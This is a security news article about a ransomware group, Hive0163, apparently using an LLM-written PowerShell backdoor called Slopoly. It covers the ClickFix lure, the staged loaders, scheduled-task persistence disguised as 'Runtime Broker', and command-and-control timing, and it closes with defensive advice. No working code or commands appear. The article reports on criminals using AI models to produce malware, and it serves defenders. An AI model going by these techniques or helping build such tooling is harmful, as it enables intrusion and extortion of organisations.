Mar 14, 2026 · 5 min read
This Ransomware Gang Is Using ChatGPT to Write Its Malware
Security researchers have identified a ransomware group called Hive0163 deploying AI generated malware to maintain persistent access inside corporate networks, marking a new phase in how criminal gangs weaponize large language models.
AI Wrote the Backdoor
The malware is called Slopoly, and researchers say it was almost certainly written by a large language model. The telltale signs are unmistakable: extensive code comments explaining every function, comprehensive error handling, properly named variables, and structured logging. These are habits of AI generated code, not the kind of thing human malware authors typically bother with when writing tools meant to be used once and discarded.
Slopoly is a PowerShell based backdoor that establishes persistent access on compromised Windows servers. Once installed, it creates a scheduled task disguised as "Runtime Broker," a legitimate Windows process, making it difficult for system administrators to spot during routine checks. The tool sends system information heartbeats to its command and control server every 30 seconds and polls for new instructions every 50 seconds, giving the attackers near real time control of infected machines.
How the Attack Chain Works
Hive0163 does not start with Slopoly. The group uses a technique called ClickFix to gain initial access, tricking employees into executing PowerShell commands that download a first stage payload called NodeSnake. This initial malware establishes a foothold and retrieves the broader Interlock RAT framework, which then deploys Slopoly during later stages of the attack to maintain extended network access.
The ClickFix technique works by presenting victims with a fake error message or verification prompt, often disguised as a CAPTCHA or browser update. When users follow the instructions to "fix" the problem, they unknowingly execute the malicious PowerShell command. The social engineering is effective precisely because it exploits a natural instinct: when something appears broken, people want to fix it.
Once inside the network, Hive0163 typically spends more than a week conducting reconnaissance before deploying ransomware. During this period, the group exfiltrates sensitive data, maps the network infrastructure, and identifies high value targets. The final phase involves encrypting systems and threatening to publish the stolen data unless a ransom is paid.
The AI Advantage for Criminals
What makes the Slopoly case significant is not that the malware is particularly sophisticated. In fact, researchers noted that it is relatively unsophisticated: despite calling itself a "Polymorphic C2 Persistence Client," it cannot actually modify its own code during execution. The real significance is what it represents about the changing economics of cybercrime.
Previously, writing functional malware required meaningful programming expertise. Ransomware gangs either needed skilled developers on their teams or had to purchase tools from underground markets. AI generated malware lowers that barrier dramatically. A criminal with basic technical knowledge can now prompt a large language model to generate a working backdoor, complete with persistence mechanisms and command and control capabilities, in minutes rather than days.
Slopoly's builder can also generate new variants by randomizing configuration values and function names, making each deployment slightly different. While this is not true polymorphism, it is enough to evade signature based detection tools that rely on matching known patterns. The combination of AI generation and automated variation creates a volume problem for defenders: more unique samples to analyze, with less human effort required from the attackers.
A Growing Trend in 2026
IBM's 2026 X Force Threat Index reported a 44% increase in attacks on public facing applications, with AI tools helping attackers identify weaknesses faster. The report also found that AI generated phishing attacks surged 14 times during the end of year holiday period, showing that criminals are applying language models across the entire attack lifecycle, from initial social engineering to persistent malware deployment.
Hive0163 is not the first group to use AI generated tools, but the explicit use of LLM output as production malware rather than just a drafting aid marks an escalation. Security teams can no longer assume that sloppy code means a low skilled attacker or that well documented code means a legitimate tool. The signals that analysts have traditionally used to assess threat sophistication are becoming unreliable.
How to Protect Yourself
- Be suspicious of any prompt asking you to copy and paste commands into a terminal or run PowerShell scripts
- Enable PowerShell constrained language mode on workstations to limit script execution capabilities
- Monitor for unexpected scheduled tasks, especially those mimicking legitimate Windows process names like Runtime Broker
- Implement network segmentation to limit lateral movement if an attacker gains initial access
- Deploy endpoint detection and response tools that analyze behavior rather than relying solely on signature matching